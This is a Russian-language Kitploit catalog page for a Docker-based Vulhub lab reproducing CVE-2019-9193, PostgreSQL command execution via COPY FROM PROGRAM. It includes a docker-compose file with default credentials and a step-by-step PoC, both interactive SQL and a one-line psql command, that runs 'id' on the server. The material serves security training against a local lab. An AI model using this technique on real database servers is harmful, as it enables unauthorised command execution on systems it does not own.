Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-9193byVulHub — Лаборатория на основе Docker, демонстрирующая CVE-2019-9193 — произвольное выполнение команд PostgreSQL через COPY FROM PROGRAM, с пошаговым PoC для тестирования безопасности и обучения. | Kitploit
Инструменты/GitHubGitHub/corsisechero/cve-2019-9193byvulhub
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеБезопасность Баз ДанныхЛаборатории и Практика
GitHubcorsisechero/cve-2019-9193byvulhub

CVE-2019-9193byVulHub

Лаборатория на основе Docker, демонстрирующая CVE-2019-9193 — произвольное выполнение команд PostgreSQL через COPY FROM PROGRAM, с пошаговым PoC для тестирования безопасности и обучения.

Репозиторий
51 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-9193byVulHub


Произвольное выполнение команд в PostgreSQL с правами администратора (CVE-2019-9193)

Описание

PostgreSQL — это мощная система управления реляционными базами данных с открытым исходным кодом. Уязвимость в версиях с 9.3 по 11 позволяет администраторам или пользователям с привилегиями COPY TO/FROM PROGRAM выполнять произвольные команды в системе.

Ссылки:

  • GitHub - Vulhub - PostgreSQL CVE-2019-9193
  • Greenwolf Security - Authenticated Arbitrary Command Execution on PostgreSQL 9.3 - Latest

Настройка окружения

Файл Docker Compose ()

docker-compose.yml

Создайте файл docker-compose.yml со следующим содержимым:

root@kitploit:~
version: '2'
services:
 postgres:
   image: vulhub/postgres:10.7
   ports:
    - "5432:5432"
   environment:
    - POSTGRES_PASSWORD=postgres

Запуск контейнера PostgreSQL

Запустите контейнер следующей командой:

root@kitploit:~
docker compose up -d

Проверьте, что контейнер работает:

root@kitploit:~
docker ps

Вывод должен показывать контейнер PostgreSQL, ожидающий подключения на порту 5432.


Выполнение эксплойта без входа в контейнер

1. Установка клиента PostgreSQL

Если у вас не установлен клиент psql, вы можете установить его с помощью:

  • Kali:
    root@kitploit:~
    apt-get install postgresql-client
    

2. Подключение к базе данных из командной строки

Подключитесь к базе данных напрямую из Kali:

root@kitploit:~
psql -h localhost -p 5432 -U postgres

Вам будет предложено ввести пароль, введите:

root@kitploit:~
postgres

3. Выполнение PoC (Proof of Concept)

После подключения к консоли PostgreSQL выполните следующие команды для использования уязвимости:

root@kitploit:~
-- Elimina la tabella se esiste
DROP TABLE IF EXISTS cmd_exec;

-- Crea una nuova tabella per memorizzare l'output del comando
CREATE TABLE cmd_exec(cmd_output text);

-- Esegui il comando 'id' tramite la funzione COPY FROM PROGRAM
COPY cmd_exec FROM PROGRAM 'id';

-- Visualizza l'output del comando
SELECT * FROM cmd_exec;

4. Выполнение команды из командной строки (без интерактивной оболочки)

Вы можете выполнить всё напрямую из командной строки:

root@kitploit:~
psql -h localhost -p 5432 -U postgres -c "DROP TABLE IF EXISTS cmd_exec; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;"

Проверка вывода

Если эксплойт успешен, вы должны увидеть вывод, похожий на:

root@kitploit:~
       cmd_output
-------------------------
 uid=999(postgres) gid=999(postgres) groups=999(postgres)
(1 row)

Выход из консоли PostgreSQL

Нажмите \q для выхода:

root@kitploit:~
\q

Примечания по безопасности

Эта уязвимость позволяет выполнять произвольные команды с административными привилегиями. Используйте её только в контролируемых средах и в целях обучения или проверки. Использование этой уязвимости на несанкционированных системах незаконно.

Скачать инструмент